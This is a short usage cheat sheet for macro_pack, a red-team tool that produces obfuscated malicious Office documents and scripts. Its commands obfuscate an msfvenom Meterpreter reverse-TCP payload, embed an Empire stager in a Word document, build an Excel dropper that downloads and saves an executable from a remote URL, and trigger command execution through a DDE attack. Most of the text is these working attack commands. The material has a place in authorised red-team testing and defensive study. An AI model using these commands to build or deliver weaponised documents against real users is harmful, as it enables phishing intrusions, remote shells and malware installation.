Macro_pack

A tool used to automatize the obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for red teaming.

Install: (Binary)

1. Get the latest binary from https://github.com/sevagas/macro_pack/releases/

2. Download binary on PC with genuine Microsoft Office installed.

3. Open console, CD to binary dir and call the binary

Install: (Git)

git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

Usage:

# Help Page
python3 macro_pack.py  --help

# List all supported file formats
macro_pack.exe --listformats
# Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba

# Obfuscate Empire stager VBA file and generate a MS Word document:
macro_pack.exe -f empire.vba -o -G myDoc.docm

# Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)
echo "https://myurl.url/payload.exe" "dropped.exe" |  macro_pack.exe -o -t DROPPER -G "drop.xlsm" 

# Execute calc.exe via Dynamic Data Exchange (DDE) attack
echo calc.exe | macro_pack.exe --dde -G calc.xslx